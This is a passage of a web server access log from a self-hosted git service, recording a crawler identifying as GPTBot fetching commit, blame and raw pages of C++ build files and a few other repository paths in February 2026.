"/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 10947] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" -[17/Feb/2026:15:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11209] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 10947] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" -[17/Feb/2026:15:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10183] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:15:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:15:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10185] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:15:56:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:15:56:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12302] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:15:56:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:15:56:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:15:56:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10184] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:15:56:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:15:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9983] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:15:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:15:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10185] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:15:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 20008] [Gzip 15.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:15:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 12624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:15:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 12624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:15:57:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 20008] [Gzip 15.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:15:57:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:15:57:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:15:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 11419] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" -[17/Feb/2026:15:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 10946] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" -[17/Feb/2026:15:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:15:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 9952] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:15:57:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png" -[17/Feb/2026:15:57:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" -[17/Feb/2026:15:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/projects?q=&sort=reversealphabetically&state=open" [Client 74.7.227.38] [Length 7806] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/projects" -[17/Feb/2026:15:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10317] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:57:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11599] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:57:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10318] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10315] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:15:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:15:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 12624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:15:57:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2finclude%2fsite%2fpython3.12%2fgreenlet" [Client 74.7.227.38] [Length 29205] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:15:57:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 10479] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:15:57:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 20008] [Gzip 15.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:15:57:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:15:57:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33677] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:57:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:57:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:57:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:57:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:57:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33678] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:57:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33675] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:15:57:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10812] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:57:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10316] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:57:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 